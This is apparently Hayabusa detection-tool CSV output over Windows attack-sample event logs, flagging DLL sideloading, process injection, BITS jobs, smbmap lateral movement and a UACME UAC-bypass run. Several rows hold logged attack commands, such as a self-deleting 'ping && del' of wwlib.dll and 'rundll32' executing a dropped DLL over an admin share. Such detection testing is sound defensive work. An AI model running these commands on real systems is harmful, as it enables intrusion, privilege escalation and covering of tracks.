2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.312 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: <unknown process> | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 840 | Tgt PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\explorer.exe"" | Process: C:\Windows\SysWOW64\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 6552 | PGUID: 747F3D96-D8EC-5F8A-0000-001094207300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Windows\SysWOW64\explorer.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 6552 | Tgt PGUID: 747F3D96-D8EC-5F8A-0000-001094207300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,Evas | Exec,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1576 | PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,Exec,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:45.130 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 1576 | Tgt PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1680 | PGUID: 747F3D96-D8F5-5F8A-0000-00106B6F7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe | URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe | URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Intel\wwlib.dll | Process: C:\Windows\Explorer.EXE | PID: 3364 | PGUID: 747F3D96-19FB-5F8B-0000-0010DB270A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: calc.exe | Process: C:\Windows\SysWOW64\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\ProgramData\Intel\CV.exe"" | LID: 0x8faa7 | PID: 1536 | PGUID: 747F3D96-1B5C-5F8B-0000-001006AF2100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca | Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 5912 | PGUID: 747F3D96-1B5C-5F8B-0000-0010A6E02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | Process: C:\Windows\System32\RuntimeBroker.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:10.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCJVGQ5XQYJQFTRJAKRF.temp | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:10.791 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:52:31.218 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57238 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\7okjer.dll | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:52:34.966 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57239 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:01.646 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57240 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:04.161 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57241 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:04.924 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57242 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2628 | PGUID: 747F3D96-75D1-5F8B-0000-00109EB23300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.633 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 4864 | PGUID: 747F3D96-75D1-5F8B-0000-001061BD3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.720 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2784 | PGUID: 747F3D96-75D1-5F8B-0000-001088C23300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.822 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.001,technique_name=PowerShell | Cmd: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 | Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x17ed8c | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00 | Hash: 